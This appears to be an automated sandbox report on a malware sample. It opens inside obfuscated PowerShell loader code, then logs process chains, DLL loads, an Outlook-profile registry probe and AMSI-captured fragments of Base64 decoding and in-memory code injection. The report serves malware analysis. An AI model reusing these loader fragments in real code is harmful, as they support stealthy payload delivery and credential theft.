s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbOx source: powershell.exe, 00000004.00000002.2007607126.0000000007B65000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000004.00000002.2011727696.0000000008C4C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2007607126.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb08055DA94 source: powershell.exe, 00000004.00000002.2011727696.0000000008C40000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb35 source: powershell.exe, 00000004.00000002.2007607126.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, AtBroker.exe
        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2011727696.0000000008C4C000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("PowerShell.exe", ""$Kildematerialet107 = 1;$Kernevaabnet=", "", "", "0");
        Source: Yara matchFile source: 00000004.00000002.2012540272.000000000AC33000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2012139926.0000000008E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2003727475.00000000062A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.2218474708.0000024A90076000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ampholyte204)$global:Episcopised = [System.Text.Encoding]::ASCII.GetString($Stammeringly)$global:Curculios=$Episcopised.substring(325430,26558)<#Overfringsformater Samhandels diskfil
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Pseudotubercular $Frygiskes $Fr), (Eftertaklings @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Udrasedes = [AppDomain]::CurrentDomain.GetAssemblies()$glo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lif)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($striper, $false).DefineType($Optanterne, $Unforgotten
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ampholyte204)$global:Episcopised = [System.Text.Encoding]::ASCII.GetString($Stammeringly)$global:Curculios=$Episcopised.substring(325430,26558)<#Overfringsformater Samhandels diskfil
